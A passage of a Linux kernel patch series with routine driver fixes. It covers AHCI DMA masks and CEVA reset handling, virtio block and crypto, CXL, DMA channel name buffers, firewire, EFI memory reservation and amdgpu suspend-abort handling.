++				    struct ahci_host_priv *hpriv)
+ {
+-	const int dma_bits = using_dac ? 64 : 32;
++	int dma_bits;
+ 	int rc;
+ 
++	if (hpriv->cap & HOST_CAP_64) {
++		dma_bits = 64;
++		if (hpriv->flags & AHCI_HFLAG_43BIT_ONLY)
++			dma_bits = 43;
++	} else {
++		dma_bits = 32;
++	}
++
+ 	/*
+ 	 * If the device fixup already set the dma_mask to some non-standard
+ 	 * value, don't extend it here. This happens on STA2X11, for example.
+@@ -1921,7 +1948,7 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	ahci_gtf_filter_workaround(host);
+ 
+ 	/* initialize adapter */
+-	rc = ahci_configure_dma_masks(pdev, hpriv->cap & HOST_CAP_64);
++	rc = ahci_configure_dma_masks(pdev, hpriv);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/ata/ahci.h b/drivers/ata/ahci.h
+index ff8e6ae1c6362..f9c5906a8afa8 100644
+--- a/drivers/ata/ahci.h
++++ b/drivers/ata/ahci.h
+@@ -247,6 +247,7 @@ enum {
+ 	AHCI_HFLAG_SUSPEND_PHYS		= BIT(26), /* handle PHYs during
+ 						      suspend/resume */
+ 	AHCI_HFLAG_NO_SXS		= BIT(28), /* SXS not supported */
++	AHCI_HFLAG_43BIT_ONLY		= BIT(29), /* 43bit DMA addr limit */
+ 
+ 	/* ap->flags bits */
+ 
+diff --git a/drivers/ata/ahci_ceva.c b/drivers/ata/ahci_ceva.c
+index cb24ecf36fafe..50e07ea60e45c 100644
+--- a/drivers/ata/ahci_ceva.c
++++ b/drivers/ata/ahci_ceva.c
+@@ -88,7 +88,6 @@ struct ceva_ahci_priv {
+ 	u32 axicc;
+ 	bool is_cci_enabled;
+ 	int flags;
+-	struct reset_control *rst;
+ };
+ 
+ static unsigned int ceva_ahci_read_id(struct ata_device *dev,
+@@ -189,6 +188,60 @@ static struct scsi_host_template ahci_platform_sht = {
+ 	AHCI_SHT(DRV_NAME),
+ };
+ 
++static int ceva_ahci_platform_enable_resources(struct ahci_host_priv *hpriv)
++{
++	int rc, i;
++
++	rc = ahci_platform_enable_regulators(hpriv);
++	if (rc)
++		return rc;
++
++	rc = ahci_platform_enable_clks(hpriv);
++	if (rc)
++		goto disable_regulator;
++
++	/* Assert the controller reset */
++	rc = ahci_platform_assert_rsts(hpriv);
++	if (rc)
++		goto disable_clks;
++
++	for (i = 0; i < hpriv->nports; i++) {
++		rc = phy_init(hpriv->phys[i]);
++		if (rc)
++			goto disable_rsts;
++	}
++
++	/* De-assert the controller reset */
++	ahci_platform_deassert_rsts(hpriv);
++
++	for (i = 0; i < hpriv->nports; i++) {
++		rc = phy_power_on(hpriv->phys[i]);
++		if (rc) {
++			phy_exit(hpriv->phys[i]);
++			goto disable_phys;
++		}
++	}
++
++	return 0;
++
++disable_rsts:
++	ahci_platform_deassert_rsts(hpriv);
++
++disable_phys:
++	while (--i >= 0) {
++		phy_power_off(hpriv->phys[i]);
++		phy_exit(hpriv->phys[i]);
++	}
++
++disable_clks:
++	ahci_platform_disable_clks(hpriv);
++
++disable_regulator:
++	ahci_platform_disable_regulators(hpriv);
++
++	return rc;
++}
++
+ static int ceva_ahci_probe(struct platform_device *pdev)
+ {
+ 	struct device_node *np = pdev->dev.of_node;
+@@ -203,47 +256,19 @@ static int ceva_ahci_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	cevapriv->ahci_pdev = pdev;
+-
+-	cevapriv->rst = devm_reset_control_get_optional_exclusive(&pdev->dev,
+-								  NULL);
+-	if (IS_ERR(cevapriv->rst))
+-		dev_err_probe(&pdev->dev, PTR_ERR(cevapriv->rst),
+-			      "failed to get reset\n");
+-
+ 	hpriv = ahci_platform_get_resources(pdev, 0);
+ 	if (IS_ERR(hpriv))
+ 		return PTR_ERR(hpriv);
+ 
+-	if (!cevapriv->rst) {
+-		rc = ahci_platform_enable_resources(hpriv);
+-		if (rc)
+-			return rc;
+-	} else {
+-		int i;
++	hpriv->rsts = devm_reset_control_get_optional_exclusive(&pdev->dev,
++								NULL);
++	if (IS_ERR(hpriv->rsts))
++		return dev_err_probe(&pdev->dev, PTR_ERR(hpriv->rsts),
++				     "failed to get reset\n");
+ 
+-		rc = ahci_platform_enable_clks(hpriv);
+-		if (rc)
+-			return rc;
+-		/* Assert the controller reset */
+-		reset_control_assert(cevapriv->rst);
+-
+-		for (i = 0; i < hpriv->nports; i++) {
+-			rc = phy_init(hpriv->phys[i]);
+-			if (rc)
+-				return rc;
+-		}
+-
+-		/* De-assert the controller reset */
+-		reset_control_deassert(cevapriv->rst);
+-
+-		for (i = 0; i < hpriv->nports; i++) {
+-			rc = phy_power_on(hpriv->phys[i]);
+-			if (rc) {
+-				phy_exit(hpriv->phys[i]);
+-				return rc;
+-			}
+-		}
+-	}
++	rc = ceva_ahci_platform_enable_resources(hpriv);
++	if (rc)
++		return rc;
+ 
+ 	if (of_property_read_bool(np, "ceva,broken-gen2"))
+ 		cevapriv->flags = CEVA_FLAG_BROKEN_GEN2;
+@@ -252,52 +277,60 @@ static int ceva_ahci_probe(struct platform_device *pdev)
+ 	if (of_property_read_u8_array(np, "ceva,p0-cominit-params",
+ 					(u8 *)&cevapriv->pp2c[0], 4) < 0) {
+ 		dev_warn(dev, "ceva,p0-cominit-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u8_array(np, "ceva,p1-cominit-params",
+ 					(u8 *)&cevapriv->pp2c[1], 4) < 0) {
+ 		dev_warn(dev, "ceva,p1-cominit-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/* Read OOB timing value for COMWAKE from device-tree*/
+ 	if (of_property_read_u8_array(np, "ceva,p0-comwake-params",
+ 					(u8 *)&cevapriv->pp3c[0], 4) < 0) {
+ 		dev_warn(dev, "ceva,p0-comwake-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u8_array(np, "ceva,p1-comwake-params",
+ 					(u8 *)&cevapriv->pp3c[1], 4) < 0) {
+ 		dev_warn(dev, "ceva,p1-comwake-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/* Read phy BURST timing value from device-tree */
+ 	if (of_property_read_u8_array(np, "ceva,p0-burst-params",
+ 					(u8 *)&cevapriv->pp4c[0], 4) < 0) {
+ 		dev_warn(dev, "ceva,p0-burst-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u8_array(np, "ceva,p1-burst-params",
+ 					(u8 *)&cevapriv->pp4c[1], 4) < 0) {
+ 		dev_warn(dev, "ceva,p1-burst-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/* Read phy RETRY interval timing value from device-tree */
+ 	if (of_property_read_u16_array(np, "ceva,p0-retry-params",
+ 					(u16 *)&cevapriv->pp5c[0], 2) < 0) {
+ 		dev_warn(dev, "ceva,p0-retry-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	if (of_property_read_u16_array(np, "ceva,p1-retry-params",
+ 					(u16 *)&cevapriv->pp5c[1], 2) < 0) {
+ 		dev_warn(dev, "ceva,p1-retry-params property not defined\n");
+-		return -EINVAL;
++		rc = -EINVAL;
++		goto disable_resources;
+ 	}
+ 
+ 	/*
+@@ -335,7 +368,7 @@ static int __maybe_unused ceva_ahci_resume(struct device *dev)
+ 	struct ahci_host_priv *hpriv = host->private_data;
+ 	int rc;
+ 
+-	rc = ahci_platform_enable_resources(hpriv);
++	rc = ceva_ahci_platform_enable_resources(hpriv);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index fa2fc1953fc26..f14e56a5cff6b 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -2005,6 +2005,10 @@ void ata_dev_power_set_active(struct ata_device *dev)
+ 	struct ata_taskfile tf;
+ 	unsigned int err_mask;
+ 
++	/* If the device is already sleeping, do nothing. */
++	if (dev->flags & ATA_DFLAG_SLEEPING)
++		return;
++
+ 	/*
+ 	 * Issue READ VERIFY SECTORS command for 1 sector at lba=0 only
+ 	 * if supported by the device.
+diff --git a/drivers/block/aoe/aoeblk.c b/drivers/block/aoe/aoeblk.c
+index 128722cf6c3ca..827802e418dd3 100644
+--- a/drivers/block/aoe/aoeblk.c
++++ b/drivers/block/aoe/aoeblk.c
+@@ -333,6 +333,7 @@ aoeblk_gdalloc(void *vp)
+ 	struct gendisk *gd;
+ 	mempool_t *mp;
+ 	struct blk_mq_tag_set *set;
++	sector_t ssize;
+ 	ulong flags;
+ 	int late = 0;
+ 	int err;
+@@ -395,7 +396,7 @@ aoeblk_gdalloc(void *vp)
+ 	gd->minors = AOE_PARTITIONS;
+ 	gd->fops = &aoe_bdops;
+ 	gd->private_data = d;
+-	set_capacity(gd, d->ssize);
++	ssize = d->ssize;
+ 	snprintf(gd->disk_name, sizeof gd->disk_name, "etherd/e%ld.%d",
+ 		d->aoemajor, d->aoeminor);
+ 
+@@ -404,6 +405,8 @@ aoeblk_gdalloc(void *vp)
+ 
+ 	spin_unlock_irqrestore(&d->lock, flags);
+ 
++	set_capacity(gd, ssize);
++
+ 	err = device_add_disk(NULL, gd, aoe_attr_groups);
+ 	if (err)
+ 		goto out_disk_cleanup;
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index 3124837aa406f..505026f0025c7 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -1206,14 +1206,15 @@ static int virtblk_freeze(struct virtio_device *vdev)
+ {
+ 	struct virtio_blk *vblk = vdev->priv;
+ 
++	/* Ensure no requests in virtqueues before deleting vqs. */
++	blk_mq_freeze_queue(vblk->disk->queue);
++
+ 	/* Ensure we don't receive any more interrupts */
+ 	virtio_reset_device(vdev);
+ 
+ 	/* Make sure no work handler is accessing the device. */
+ 	flush_work(&vblk->config_work);
+ 
+-	blk_mq_quiesce_queue(vblk->disk->queue);
+-
+ 	vdev->config->del_vqs(vdev);
+ 	kfree(vblk->vqs);
+ 
+@@ -1231,7 +1232,7 @@ static int virtblk_restore(struct virtio_device *vdev)
+ 
+ 	virtio_device_ready(vdev);
+ 
+-	blk_mq_unquiesce_queue(vblk->disk->queue);
++	blk_mq_unfreeze_queue(vblk->disk->queue);
+ 	return 0;
+ }
+ #endif
+diff --git a/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c b/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c
+index 168195672e2e1..d2df97cfcb294 100644
+--- a/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c
++++ b/drivers/crypto/virtio/virtio_crypto_akcipher_algs.c
+@@ -104,7 +104,8 @@ static void virtio_crypto_dataq_akcipher_callback(struct virtio_crypto_request *
+ }
+ 
+ static int virtio_crypto_alg_akcipher_init_session(struct virtio_crypto_akcipher_ctx *ctx,
+-		struct virtio_crypto_ctrl_header *header, void *para,
++		struct virtio_crypto_ctrl_header *header,
++		struct virtio_crypto_akcipher_session_para *para,
+ 		const uint8_t *key, unsigned int keylen)
+ {
+ 	struct scatterlist outhdr_sg, key_sg, inhdr_sg, *sgs[3];
+@@ -128,7 +129,7 @@ static int virtio_crypto_alg_akcipher_init_session(struct virtio_crypto_akcipher
+ 
+ 	ctrl = &vc_ctrl_req->ctrl;
+ 	memcpy(&ctrl->header, header, sizeof(ctrl->header));
+-	memcpy(&ctrl->u, para, sizeof(ctrl->u));
++	memcpy(&ctrl->u.akcipher_create_session.para, para, sizeof(*para));
+ 	input = &vc_ctrl_req->input;
+ 	input->status = cpu_to_le32(VIRTIO_CRYPTO_ERR);
+ 
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index 003a44132418a..5584af15300a8 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -376,9 +376,9 @@ static bool __cxl_hdm_decode_init(struct cxl_dev_state *cxlds,
+ 		allowed++;
+ 	}
+ 
+-	if (!allowed) {
+-		cxl_set_mem_enable(cxlds, 0);
+-		info->mem_enabled = 0;
++	if (!allowed && info->mem_enabled) {
++		dev_err(dev, "Range register decodes outside platform defined CXL ranges.\n");
++		return -ENXIO;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/dma/apple-admac.c b/drivers/dma/apple-admac.c
+index 4cf8da77bdd91..cac4532fe23a9 100644
+--- a/drivers/dma/apple-admac.c
++++ b/drivers/dma/apple-admac.c
+@@ -56,6 +56,8 @@
+ 
+ #define REG_BUS_WIDTH(ch)	(0x8040 + (ch) * 0x200)
+ 
++#define BUS_WIDTH_WORD_SIZE	GENMASK(3, 0)
++#define BUS_WIDTH_FRAME_SIZE	GENMASK(7, 4)
+ #define BUS_WIDTH_8BIT		0x00
+ #define BUS_WIDTH_16BIT		0x01
+ #define BUS_WIDTH_32BIT		0x02
+@@ -739,7 +741,8 @@ static int admac_device_config(struct dma_chan *chan,
+ 	struct admac_data *ad = adchan->host;
+ 	bool is_tx = admac_chan_direction(adchan->no) == DMA_MEM_TO_DEV;
+ 	int wordsize = 0;
+-	u32 bus_width = 0;
++	u32 bus_width = readl_relaxed(ad->base + REG_BUS_WIDTH(adchan->no)) &
++		~(BUS_WIDTH_WORD_SIZE | BUS_WIDTH_FRAME_SIZE);
+ 
+ 	switch (is_tx ? config->dst_addr_width : config->src_addr_width) {
+ 	case DMA_SLAVE_BUSWIDTH_1_BYTE:
+diff --git a/drivers/dma/fsl-qdma.c b/drivers/dma/fsl-qdma.c
+index 69385f32e2756..f383f219ed008 100644
+--- a/drivers/dma/fsl-qdma.c
++++ b/drivers/dma/fsl-qdma.c
+@@ -805,7 +805,7 @@ fsl_qdma_irq_init(struct platform_device *pdev,
+ 	int i;
+ 	int cpu;
+ 	int ret;
+-	char irq_name[20];
++	char irq_name[32];
+ 
+ 	fsl_qdma->error_irq =
+ 		platform_get_irq_byname(pdev, "qdma-error");
+diff --git a/drivers/dma/sh/shdma.h b/drivers/dma/sh/shdma.h
+index 9c121a4b33ad8..f97d80343aea4 100644
+--- a/drivers/dma/sh/shdma.h
++++ b/drivers/dma/sh/shdma.h
+@@ -25,7 +25,7 @@ struct sh_dmae_chan {
+ 	const struct sh_dmae_slave_config *config; /* Slave DMA configuration */
+ 	int xmit_shift;			/* log_2(bytes_per_xfer) */
+ 	void __iomem *base;
+-	char dev_id[16];		/* unique name per DMAC of channel */
++	char dev_id[32];		/* unique name per DMAC of channel */
+ 	int pm_error;
+ 	dma_addr_t slave_addr;
+ };
+diff --git a/drivers/dma/ti/edma.c b/drivers/dma/ti/edma.c
+index 7ec6e5d728b03..9212ac9f978f2 100644
+--- a/drivers/dma/ti/edma.c
++++ b/drivers/dma/ti/edma.c
+@@ -2413,6 +2413,11 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccint",
+ 					  dev_name(dev));
++		if (!irq_name) {
++			ret = -ENOMEM;
++			goto err_disable_pm;
++		}
++
+ 		ret = devm_request_irq(dev, irq, dma_irq_handler, 0, irq_name,
+ 				       ecc);
+ 		if (ret) {
+@@ -2429,6 +2434,11 @@ static int edma_probe(struct platform_device *pdev)
+ 	if (irq > 0) {
+ 		irq_name = devm_kasprintf(dev, GFP_KERNEL, "%s_ccerrint",
+ 					  dev_name(dev));
++		if (!irq_name) {
++			ret = -ENOMEM;
++			goto err_disable_pm;
++		}
++
+ 		ret = devm_request_irq(dev, irq, dma_ccerr_handler, 0, irq_name,
+ 				       ecc);
+ 		if (ret) {
+diff --git a/drivers/firewire/core-card.c b/drivers/firewire/core-card.c
+index 6ac5ff20a2fe2..8aaa7fcb2630d 100644
+--- a/drivers/firewire/core-card.c
++++ b/drivers/firewire/core-card.c
+@@ -429,7 +429,23 @@ static void bm_work(struct work_struct *work)
+ 	 */
+ 	card->bm_generation = generation;
+ 
+-	if (root_device == NULL) {
++	if (card->gap_count == 0) {
++		/*
++		 * If self IDs have inconsistent gap counts, do a
++		 * bus reset ASAP. The config rom read might never
++		 * complete, so don't wait for it. However, still
++		 * send a PHY configuration packet prior to the
++		 * bus reset. The PHY configuration packet might
++		 * fail, but 1394-2008 8.4.5.2 explicitly permits
++		 * it in this case, so it should be safe to try.
++		 */
++		new_root_id = local_id;
++		/*
++		 * We must always send a bus reset if the gap count
++		 * is inconsistent, so bypass the 5-reset limit.
++		 */
++		card->bm_retries = 0;
++	} else if (root_device == NULL) {
+ 		/*
+ 		 * Either link_on is false, or we failed to read the
+ 		 * config rom.  In either case, pick another root.
+diff --git a/drivers/firmware/efi/arm-runtime.c b/drivers/firmware/efi/arm-runtime.c
+index 7c48c380d722c..1995f0a2e0fc0 100644
+--- a/drivers/firmware/efi/arm-runtime.c
++++ b/drivers/firmware/efi/arm-runtime.c
+@@ -107,7 +107,7 @@ static int __init arm_enable_runtime_services(void)
+ 		efi_memory_desc_t *md;
+ 
+ 		for_each_efi_memory_desc(md) {
+-			int md_size = md->num_pages << EFI_PAGE_SHIFT;
++			u64 md_size = md->num_pages << EFI_PAGE_SHIFT;
+ 			struct resource *res;
+ 
+ 			if (!(md->attribute & EFI_MEMORY_SP))
+diff --git a/drivers/firmware/efi/efi-init.c b/drivers/firmware/efi/efi-init.c
+index 2fd770b499a35..ff9791ce2e156 100644
+--- a/drivers/firmware/efi/efi-init.c
++++ b/drivers/firmware/efi/efi-init.c
+@@ -116,15 +116,6 @@ static __init int is_usable_memory(efi_memory_desc_t *md)
+ 	case EFI_BOOT_SERVICES_DATA:
+ 	case EFI_CONVENTIONAL_MEMORY:
+ 	case EFI_PERSISTENT_MEMORY:
+-		/*
+-		 * Special purpose memory is 'soft reserved', which means it
+-		 * is set aside initially, but can be hotplugged back in or
+-		 * be assigned to the dax driver after boot.
+-		 */
+-		if (efi_soft_reserve_enabled() &&
+-		    (md->attribute & EFI_MEMORY_SP))
+-			return false;
+-
+ 		/*
+ 		 * According to the spec, these regions are no longer reserved
+ 		 * after calling ExitBootServices(). However, we can only use
+@@ -169,6 +160,16 @@ static __init void reserve_regions(void)
+ 		size = npages << PAGE_SHIFT;
+ 
+ 		if (is_memory(md)) {
++			/*
++			 * Special purpose memory is 'soft reserved', which
++			 * means it is set aside initially. Don't add a memblock
++			 * for it now so that it can be hotplugged back in or
++			 * be assigned to the dax driver after boot.
++			 */
++			if (efi_soft_reserve_enabled() &&
++			    (md->attribute & EFI_MEMORY_SP))
++				continue;
++
+ 			early_init_dt_add_memory_arch(paddr, size);
+ 
+ 			if (!is_usable_memory(md))
+diff --git a/drivers/firmware/efi/libstub/Makefile b/drivers/firmware/efi/libstub/Makefile
+index ef5045a53ce09..b6e1dcb98a64c 100644
+--- a/drivers/firmware/efi/libstub/Makefile
++++ b/drivers/firmware/efi/libstub/Makefile
+@@ -25,7 +25,7 @@ cflags-$(CONFIG_ARM)		:= $(subst $(CC_FLAGS_FTRACE),,$(KBUILD_CFLAGS)) \
+ 				   -fno-builtin -fpic \
+ 				   $(call cc-option,-mno-single-pic-base)
+ cflags-$(CONFIG_RISCV)		:= $(subst $(CC_FLAGS_FTRACE),,$(KBUILD_CFLAGS)) \
+-				   -fpic
++				   -fpic -mno-relax
+ cflags-$(CONFIG_LOONGARCH)	:= $(subst $(CC_FLAGS_FTRACE),,$(KBUILD_CFLAGS)) \
+ 				   -fpie
+ 
+diff --git a/drivers/firmware/efi/riscv-runtime.c b/drivers/firmware/efi/riscv-runtime.c
+index d0daacd2c903f..6b142aa35389e 100644
+--- a/drivers/firmware/efi/riscv-runtime.c
++++ b/drivers/firmware/efi/riscv-runtime.c
+@@ -85,7 +85,7 @@ static int __init riscv_enable_runtime_services(void)
+ 		efi_memory_desc_t *md;
+ 
+ 		for_each_efi_memory_desc(md) {
+-			int md_size = md->num_pages << EFI_PAGE_SHIFT;
++			u64 md_size = md->num_pages << EFI_PAGE_SHIFT;
+ 			struct resource *res;
+ 
+ 			if (!(md->attribute & EFI_MEMORY_SP))
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index c46c6fbd235e8..e636c7850f777 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -999,6 +999,8 @@ struct amdgpu_device {
+ 	bool				in_s3;
+ 	bool				in_s4;
+ 	bool				in_s0ix;
++	/* indicate amdgpu suspension status */
++	bool				suspend_complete;
+ 
+ 	enum pp_mp1_state               mp1_state;
+ 	struct amdgpu_doorbell_index doorbell_index;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index b9983ca99eb7d..f24c3a20e901d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2414,6 +2414,7 @@ static int amdgpu_pmops_suspend(struct device *dev)
+ 	struct drm_device *drm_dev = dev_get_drvdata(dev);
+ 	struct amdgpu_device *adev = drm_to_adev(drm_dev);
+ 
++	adev->suspend_complete = false;
+ 	if (amdgpu_acpi_is_s0ix_active(adev))
+ 		adev->in_s0ix = true;
+ 	else if (amdgpu_acpi_is_s3_active(adev))
+@@ -2428,6 +2429,7 @@ static int amdgpu_pmops_suspend_noirq(struct device *dev)
+ 	struct drm_device *drm_dev = dev_get_drvdata(dev);
+ 	struct amdgpu_device *adev = drm_to_adev(drm_dev);
+ 
++	adev->suspend_complete = true;
+ 	if (amdgpu_acpi_should_gpu_reset(adev))
+ 		return amdgpu_asic_reset(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 84ca601f7d5f3..195b298923543 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3064,6 +3064,14 @@ static int gfx_v9_0_cp_gfx_start(struct amdgpu_device *adev)
+ 
+ 	gfx_v9_0_cp_gfx_enable(adev, true);
+ 
++	/* Now only limit the quirk on the APU gfx9 series and already
++	 * confirmed that the APU gfx10/gfx11 needn't such update.
++	 */
++	if (adev->flags & AMD_IS_APU &&
++			adev->in_s3 && !adev->suspend_complete) {
++		DRM_INFO(" Will skip the CSB packet resubmit\n");
++		return 0;
++	}
+ 	r = amdgpu_ring_alloc(ring, gfx_v9_0_get_csb_size(adev) + 4 + 3);
+ 	if (r) {
+ 		DRM_ERROR("amdgpu: cp failed to lock ring (%d).\n", r);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 811dd3ea63620..489c89465c78b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -1285,10 +1285,32 @@ static int soc15_common_suspend(void *handle)
+ 	return soc15_common_hw_fini(adev);
+ }
+ 
++static bool soc15_need_reset_on_resume(struct amdgpu_device *adev)
++{
++	u32 sol_reg;
++
++	sol_reg = RREG32_SOC15(MP0, 0, mmMP0_SMN_C2PMSG_81);
++
++	/* Will reset for the following suspend abort cases.
++	 * 1) Only reset limit on APU side, dGPU hasn't checked yet.
++	 * 2) S3 suspend abort and TOS already launched.
++	 */
++	if (adev->flags & AMD_IS_APU && adev->in_s3 &&
++			!adev->suspend_complete &&
++			sol_reg)
++		return true;
++
++	return false;
++}
++
+ static int soc15_common_resume(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
++	if (soc15_need_reset_on_resume(adev)) {
++		dev_info(adev->dev, "S3 suspend abort case, let's reset ASIC.\n");
++		soc15_asic_reset(adev);
++	}
+ 	return soc15_common_hw_init(adev);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index a826c92933199..da16048bf1004 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2255,6 +2255,7 @@ static int dm_sw_fini(void *handle)
+ 
+ 	if (adev->dm.dmub_srv) {
+ 		dmub_srv_destroy(adev->dm.dmub_srv);
++		kfree(adev->dm.dmub_srv);
+ 		adev->dm.dmub_srv = NULL;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/drm_syncobj.c b/drivers/gpu/drm/drm_syncobj.c
+index da0145bc104a8..8f2737075dc2f 100644
+--- a/drivers/gpu/drm/drm_syncobj.c
++++ b/drivers/gpu/drm/drm_syncobj.c
+@@ -980,7 +980,8 @@ static signed long drm_syncobj_array_wait_timeout(struct drm_syncobj **syncobjs,
+ 	uint64_t *points;
+ 	uint32_t signaled_count, i;
+ 
+-	if (flags & DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT)
++	if (flags & (DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT |
++		     DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE))
+ 		lockdep_assert_none_held_once();
+ 
+ 	points = kmalloc_array(count, sizeof(*points), GFP_KERNEL);
+@@ -1049,7 +1050,8 @@ static signed long drm_syncobj_array_wait_timeout(struct drm_syncobj **syncobjs,
+ 	 * fallthough and try a 0 timeout wait!
+ 	 */
+ 
+-	if (flags & DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT) {
++	if (flags & (DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT |
++		     DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE)) {
+ 		for (i = 0; i < count; ++i)
+ 			drm_syncobj_fence_add_wait(syncobjs[i], &entries[i]);
+ 	}
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c
+index 19188683c8fca..8c2bf1c16f2a9 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadow.c
+@@ -154,11 +154,17 @@ shadow_fw_init(struct nvkm_bios *bios, const char *name)
+ 	return (void *)fw;
+ }
+ 
++static void
++shadow_fw_release(void *fw)
++{
++	release_firmware(fw);
++}
++
+ static const struct nvbios_source
+ shadow_fw = {
+ 	.name = "firmware",
+ 	.init = shadow_fw_init,
+-	.fini = (void(*)(void *))release_firmware,
++	.fini = shadow_fw_release,
+ 	.read = shadow_fw_read,
+ 	.rw = false,
+ };
+diff --git a/drivers/gpu/drm/ttm/ttm_pool.c b/drivers/gpu/drm/ttm/ttm_pool.c
+index 86affe987a1cb..393b97b4a991f 100644
+--- a/drivers/gpu/drm/ttm/ttm_pool.c
++++ b/drivers/gpu/drm/ttm/ttm_pool.c
+@@ -383,7 +383,7 @@ static void ttm_pool_free_range(struct ttm_pool *pool, struct ttm_tt *tt,
+ 				enum ttm_caching caching,
+ 				pgoff_t start_page, pgoff_t end_page)
+ {
+-	struct page **pages = tt->pages;
++	struct page **pages = &tt->pages[start_page];
+ 	unsigned int order;
+ 	pgoff_t i, nr;
+ 
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index 59344ad62822d..c0aa6bfa66b24 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -40,7 +40,7 @@ MODULE_PARM_DESC(tjmax, "TjMax value in degrees Celsius");
+ 
+ #define PKG_SYSFS_ATTR_NO	1	/* Sysfs attribute for package temp */
+ #define BASE_SYSFS_ATTR_NO	2	/* Sysfs Base attr no for coretemp */
+-#define NUM_REAL_CORES		128	/* Number of Real cores per cpu */
++#define NUM_REAL_CORES		512	/* Number of Real cores per cpu */
+ #define CORETEMP_NAME_LENGTH	28	/* String Length of attrs */
+ #define MAX_CORE_ATTRS		4	/* Maximum no of basic attrs */
+ #define TOTAL_ATTRS		(MAX_CORE_ATTRS + 1)
+diff --git a/drivers/i2c/busses/i2c-imx.c b/drivers/i2c/busses/i2c-imx.c
+index fc70920c4ddab..0c203c614197c 100644
+--- a/drivers/i2c/busses/i2c-imx.c
++++ b/drivers/i2c/busses/i2c-imx.c
+@@ -804,6 +804,11 @@ static irqreturn_t i2c_imx_slave_handle(struct imx_i2c_struct *i2c_imx,
+ 		ctl &= ~I2CR_MTX;
+ 		imx_i2c_write_reg(ctl, i2c_imx, IMX_I2C_I2CR);
+ 		imx_i2c_read_reg(i2c_imx, IMX_I2C_I2DR);
++
++		/* flag the last byte as processed */
++		i2c_imx_slave_event(i2c_imx,
++				    I2C_SLAVE_READ_PROCESSED, &value);
++
+ 		i2c_imx_slave_finish_op(i2c_imx);
+ 		return IRQ_HANDLED;
+ 	}
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 4ed8814efde6f..6ed0568747eaa 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
